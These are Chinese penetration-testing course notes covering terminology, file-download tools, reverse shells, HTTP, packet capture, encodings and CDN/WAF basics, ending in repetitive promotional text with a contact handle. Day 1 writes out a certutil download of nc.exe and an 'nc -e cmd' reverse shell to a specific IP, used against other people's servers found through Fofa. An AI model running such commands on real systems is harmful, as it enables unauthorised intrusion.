【小迪安全】红蓝对抗 网络攻防 V2022全栈培训笔记_小迪安全2022

第1天：基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙

知识点：

1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词
2、必备技能-操作系统-用途&命令&权限&用户&防火墙
3、必备技能-文件下载-缘由&场景&使用-提权&后渗透
4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透
前后端，Poc/EXP,Payload/she1 lcode,后门/Webshel1,木马/病毒，
反弹，回显，跳板，黑白盒测试，暴力破解，社会工程学，撞库，ATT&CK等
参考：
https://www.cnblogs.com/sunny11/p/13583083.html
https://forum.ywhack.com/bountytips.php?download
https://forum.ywhack.com/reverse-shell/
https://blog.csdn.net/weixin_43303273/article/details/83029138

POC：全称 ’ Proof of Concept '，中文 ’ 概念验证 ’ ，常指一段漏洞证明的代码。
EXP：全称 ’ Exploit '，中文 ’ 利用 '，指利用系统漏洞进行攻击的动作。
Payload：中文 ’ 有效载荷 '，指成功exploit之后，真正在目标系统执行的代码或指令。
Shellcode：简单翻译 ’ shell代码 '，是Payload的一种，由于其建立正向/反向shell而得名。

基础案例1：操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机
2、Windows&Linux常见命令
3、文件权限&服务权限&用户权限等
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

实用案例1：文件上传下载-解决无图形化&解决数据传输 一

Linux: wget curl python ruby perl java等
Windows: PowerShell Certutil Bitsadmin msiexec mshta rundll32等
棱角社区：https://forum.ywhack.com/(提供反弹shell、文件下载、在线编码工具等)

实用案例2：反弹Shell命令-解决数据回显解决数据通讯

useradd 用户名passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题

#结合案例1：防火墙绕过-正向连接&反向连接&内网服务器
1、内网：
内网->xiaodi8
xiaodi8!->内网（建议学习一下网络通信基础中的DNAT和SNAT即可理解）

解决公网访问内网服务器的技术：端口映射。

2、防火墙：
xiaodi8 <-aliyun
xiaodi8防火墙->aliyun
a1iyun！->xiaodi8防火墙

（防火墙具有出栈规则宽松，入栈规则严格的特性，利用这条特性将内网服务器通过反弹shell将权限赋予给监听主机）

#结合案例2：学会了有手就行-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe
nc -e cmd 47.75.212.155 5566

1、通过fofa收集pikachu靶场
2、测试是否存在rce漏洞 ping 127.0.0.1 & dir查看返回信息是否含有命令执行后的内容
3、远程命令执行下载 nc.exe
4、本地NC监听开启后，使用远程命令执行反弹shell到本地服务器

第2天基础入门-Wb应用&架构搭建&漏洞&HTTP数据包&代理服务器

知识点：

1、网站搭建前置知识 2、WEB应用环境架构类 3、WEB应用安全漏洞分类 4、WEB请求返回过程数据包

网站搭建前置知识

域名，子域名，DNS,HTTP/HTTPS,证书等

WEB应用环境架构类

理解不同WEB应用组成角色功能架构：
开发语言，程序源码，中间件容器，数据库类型，服务器操作系统，第三方软件等
开发语言：asp,php,aspx,jsp,java,python,ruby,go,html,javascripts等
程序源码：根据开发语言分类；应用类型分类；开源cMS分类；开发框架分类等
中间件容器：IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型：Access,Mysql,Mssql,Oracle,db2,Sysbase,Redis,MongoDB等
服务器操作系统：Windows系列，Linux系列，Mac系列等
第三方软件：phpmyadmin,vs-ftpd,VNc,ElK,Openssh等

WEB应用安全漏洞分类:

SQL注入，文件安全，RCE执行，XSS跨站，CSRE/SSRE/CRLE,
反序列化，逻辑越权，未授权访问，XE/XL,弱口令安全等

WEB请求返回过程数据包参考：

https://www.jianshu.com/p/558455228c43
https://www.cnblogs.com/cherrycui/p/10815465.html
请求数据包，请求方法，请求体，响应包，响应头，状态码，代理服务器等
Request,Response,User-Agent,Cookie,Server,Content-Length

演示案例：

架构-Web应用搭建-域名源码解析(阿里云服务器购买、使用及宝塔部署网站)
请求包新闻回帖点赞重放数据包（新浪论坛使用bp重发数据包实现）
请求包-移动端&PC访问-自定义UA头（请求包中user-agent不同导致）
返回包-网站文件目录扫描-返回状态码(根据返回码可以判断资源是否存在。)
数据包-WAF文件目录扫描-代理服务器（使用远程代理可以避免扫描目录时地址被封禁、被溯源）

HTTP状态码汇总：https://mbd.baidu.com/newspage/data/dtlandingsuper?nid=dt_4562397760533098405

第3天基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用

知识点

1、抓包技术应用意义（通过抓包工具代理APP流量获取app访问已封装的域名进行渗透测试）
2、抓包技术应用对象（小程序、APP、应用）
3、抓包技术应用协议（不使用http/https协议的应用可以通过全局代理抓包）
4、抓包技术应用支持
5、封包技术应用意义（零散和整体的区别，封包能精确到每个操作的数据包）
总结点：学会不同对象采用不同抓包封包抓取技术分析

基于网络接口抓包-网络接口
基于程序进程抓包-程序进程
基于数据协议抓包-HTTP/S&TCP&UDP
基于应用对象抓包-APP&小程序&PCUI
基于系统使用抓包-模拟器&WIN&工INUX

#参考点： Fiddder: 是一个http协议调试代理工具，它能够记录并检查所有你的电脑和互联网之间的http通讯，设置断点，查看所有的"进出"Fiddler的数据（指cookie,html,j3,css等文件）。Fiddler要比其他的网络调试器要更加简单，因为它不仅仅暴露ttp通讯还提供了一个用户友好的格式。
Charles:
是一个HTTP代理服务器，HTTP监视器，反转代理服务器，当浏览器连接Charles的代理访问互联网时，char1es可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信，这些包括cequest,respon3e和HTTP headers(包含cookies.与caching信息）
TCPDump:
是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协
议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
BurpSuite:
是用于攻击web应用程序的集成平台，包含了许多工具。Burp Suitei为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。
Wireshark:
是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽
可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进
行数据报文交换。
科来网络分析系统：是一款由科来软件全自主研发，并拥有全部知识产品的网络分析产
品。该系统具有行业领先的专家分析技术，通过捕获并分析网络中传输的底层数据包，对
网络故障、网络安全以及网络性能进行全面分析，从而快速排查网络中出现或潜在的故
障、安全及性能问题。
WPE&封包分析：是强大的网络封包编辑器，we可以截取网络上的信息，修改封包数据
是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

演示案例：

WEB应用站点操作数据抓包-浏览器审查查看元素网络监听
APP&小程序&PC抓包HTTP/S数据-Charles&Fiddler&Burpsuite
程序进程&网络接口&其他协议抓包-VireShark&科来网络分析系统
通讯类应用封包分析发送接收-WPE四件套封包&科来网络分析系统（不使用web协议的流量通过WPE封包）

#环境配置：
1、安卓模拟器安装搭建
逍遥，雷电，夜神等自行百度下载安装
2、工具相关证书安装指南
Charles:
https://blog.csdn.net/weixin_45459427/article/details/108393878
Fidder
https://blog.csdn.net/weixin 45043349/article/details/120088449
BurpSuite:
https://blog.csdn.net/qq 36658099/article/details/81487491
3、封包抓取调试见课程操作（通过傻瓜封包监听工具，实现发送历史数据包执行历史操作）

第4天基础入门-30余种加密编码进制8Wb8数据库&系统8&代码&参数值

知识点：

1、存储密码加密-Web&数据库&系统
2、传输数据编码-各类组合传输参数值
3、代码特性加密-JS&PHP6NET&JAVA
4、数据显示编码-字符串数据显示编码

本课意义：

1.了解加密编码进制在安全测试中的存在
2.掌握常见的加密解密编码解码进制互转的操作
3.了解常见的加密解密编码解密进制互转的影响
旨在解决类似疑问，提供思路：
你是否碰到不知道的加密方式？
你是否碰到无法找到的解密平台？

识别算法编码类型：

1、看密文位数
2、看密文的特征(数字，字母，大小写，符号等)
3、看当前密文存在的地方(web,数据库，操作系统等应用)

#详细点：
密码存储加密：
MD5 SHA1 NTLM AES DES RC4
MD5值是32或16位位由数字"0-9"和字母"a-f"所组成的字符串
SHA1这种加密的密文特征跟MD5差不多，只不过位数是40
NTIM这种加密是1 ndows的哈希密码，标准通讯安全协议
AES,DES,RC4这些都是非对称性加密算法，引入密钥，密文特征与Ba3e64类似
应用场景：各类应用密文，自定义算法，代码分析，CT安全比赛等
传数据编码：
BASE64 URL HEX ASCII
BAS卫64值是由数字"0-9"和字母"a-￡"所组成的字符串，大小写致感，结尾通常有符号=
U工编码是由数字"0-9"和字母"a-￡"所组成的字符串，大小写敏感，通常以数字字母间隔
EX编码是计算机中数据的一种表示方法，将数据进行十六进制转换，它由0-9,A一F,组成
ASCII编码是将128个字符进行进制数来表示，常见AscII码表大小规Q则：09<AZ<a~z
举例：
个人博客-URL解码
国外WEB-BASE64解码
搜狐视频-BASE64解码
应用场景：参数传递（如注入影响），后期F绕过干扰写法应用，视频地址还原等

JS前端代码加密：
Js颜文字jother JSFUCK
颜文字特征：一堆颜文字构成的js代码，在F12中可直接解密执行
jother特征：只用！+（）【】{}这八个字符就能完成对任意字符串的编码。也可在F12中解密执行
JSFUCK特征：与jother很像，只是少了{}

后端代码加密：
PHP .NET JAVA
PHP:乱码，头部有信息（可通过在线解密工具）
,NET:D工工封装代码文件
JAVA:JAR&CLASS文件
举例：Zend ILSpy IDEA
应用场景：版权代码加密，开发特性，CT比赛等

数据库应文加密：
MYSQL MSSQL等

数据显示编码：
UTF-8 GBK2312等

演示案例：
Web-ZZCMS-密文-MD5
注册账号后对密码进行md5解密，解密出明文字段（md5是摘要算法，不是加密算法，加密是不可逆的，所以MD5解密的原理是加速了杂凑冲撞。简单来说，就是知道一个MD5串，然后使用原文进行MD5散列后再生成同样的MD5串，也就是说找到不同的原文产生相同MD5串的方法，这不是解密而称之为碰撞。）

Web-Discuz-密文-MD5&Salt
MD5加密过程中可以通过加salt的方式增强加密的强度，这种情况下是无法通过MD5解密得到明文的。

在知道盐值的情况下可以解密（可通过百度等方式得知CMS常用盐值）

系统-Windows.-密文-NTLM&HASH
在win7版本之后账号密码通过NTML加密（Mimikatz 是一款强大的密码获取和访问凭证工具。旨在展示在 Windows 操作系统中所存储的敏感信息（如明文密码、PIN码和NTLM哈希等）是如何被攻击者获取的。这个工具可以通过多种方法提取凭证，包括从内存中提取明文密码、导出 Kerberos 切票、解密 Windows 凭据管理器中的密码等。）

综合参数密文传输-AES&BASE64
靶场解题思路：目录扫描得到未授权访问文件–通过文件得知加密方式（AES加密中密码、偏移量、模式等）

将密文解密可知参数值，通过改变参数值加密注入。
代码-解密-解密反编译-Zend&Dl川&Jar
CTF赛题-buuoj–single dog-JS颜文字
解题思路：通过foremost将文件分离（foremost是另一个常用的文件分离工具，它可以自动识别文件中的不同部分，并将它们分离出来）—将得到的颜文字通过在线JS工具解密–即可得到flag
CTF赛题-xuenixiang-Jsfuck-JSFUCK
解题思路：通过将html文件下载使用浏览器打开会乱码，更改编码方式为UTF-8得到明文

然后查看源代码发现存在有明显jsFUCK加密的特征

通过JSFUCK解密得到明文

拓展补充参考资料：
部分资源：
https://www.cmd5.com
http://tmxk.org/jother
http://www.jsfuck.com
http://www.hiencode.com
http://tool.chacuo.net/cryptaes
https://utf-8.jp/public/aaencode.html

第5天 基础入门-资产架构&端口&应用&CDN&WAF&站库分离&负载均衡

知识点：

1、资产架构-端口&目录&插件&接口&多站点&多应用
2、番外安全&域名&服务器本身&服务厂商&管理人员
3、考虑阻碍-站库分离&CDN&AF&负载均衡&主机防护

详细点：

1、前置条件-购买使用-云服务器：域名等
2、架构搭建-目录：端口：子域：插件c应用等
3、安全部署-WAF防火墙：主机防护&HIDs等
4、性能优化-负载均衡：CDN加速：OsS云存储等

演示案例：

资产架构-BT搭建&多站点&多插件&多应用等
番外安全-Aliyun&域名解析&云服务器&个人等
考虑阻碍-站库分离&部署防护&负载均衡&CDN等

#资产明构：
WEB单个源码指向安全
WEB多个目录源码安全
WEB多个端口源码安全
服务器架设多个站点安全（旁站）
架设第三方插件接口安全
服务器架设多个应用安全
#番外安全：
基于域名解析安全
基于服务器本身安全
基于服务商信息安全
基于管理个人的安全
#考虑阻碍：
阻碍-站库分离（网站和数据库放在不同服务器）
阻碍-CDN功加速服务

CDN（Content Delivery Network）是一种分布式网络架构，旨在提供高性能、可扩展的内容传输和交付服务。CDN
的目标是加快网站和应用程序的内容传输速度，减少延迟并提供更好的用户体验。

CDN 的工作原理如下：

缓存：CDN 在全球各地部署了多个边缘节点服务器，这些服务器上有大容量的缓存存储。原始内容（如网页、图像、视频等）会被缓存在这些服务器上。
路由：当用户请求访问某个资源时，请求会被智能路由到距离用户最近的边缘节点服务器。
加速交付：边缘节点服务器提供缓存的内容，直接向用户提供所需的资源，而不必每次都从源服务器获取。这样可以显著减少网络延迟，并提高内容的传输速度和响应时间。
负载均衡：CDN 可以根据流量负载和网络拥塞情况自动选择最佳的边缘节点来处理请求，确保高可用性和稳定性。 CDN的优点包括：

加速网站和应用程序的内容传输速度，提供更好的用户体验。 减轻源服务器的负载，提高可扩展性和稳定性。
提供全球范围的网络覆盖，确保内容在用户附近的节点上提供。
CDN广泛应用于网站、应用程序、媒体流等领域，许多知名的互联网公司和服务提供商都使用CDN来提供快速、高效的内容交付。

阻碍-负载均衡服务

负载均衡（LoadBalancing）是一种在计算机网络中分配工作负载的方法，通过将请求均匀地分发到多个服务器或资源上，以提高系统的性能、可靠性和可扩展性。
负载均衡的主要目标是避免单个服务器过载，并确保每个服务器都能够有效地处理请求。它可以通过以下方式实现：
请求分发：负载均衡器接收到来自客户端的请求，并将其分发给后端的多个服务器。这个过程可以基于不同的算法，如轮询、最少连接、权重等，以确保请求平均地分布到各个服务器上。
健康检查：负载均衡器会周期性地对后端服务器进行健康状态检查，以确保它们正常运行。如果某个服务器出现故障或不可用，负载均衡器将自动将请求转发到其他可用的服务器上。
扩展性：当系统负载增加时，可以向负载均衡器添加更多的服务器，以满足不断增长的请求。负载均衡器将自动将流量分发到新添加的服务器上，从而提高系统的容量和性能。
负载均衡在许多应用场景中发挥关键作用，如网站和应用程序的高可用性、流量管理、提高系统吞吐量等。常见的负载均衡技术包括硬件负载均衡器、软件负载均衡器和云平台提供的负载均衡服务。

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

b3c4714e29498573a58a3c79c775da.gif#pic_center)

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算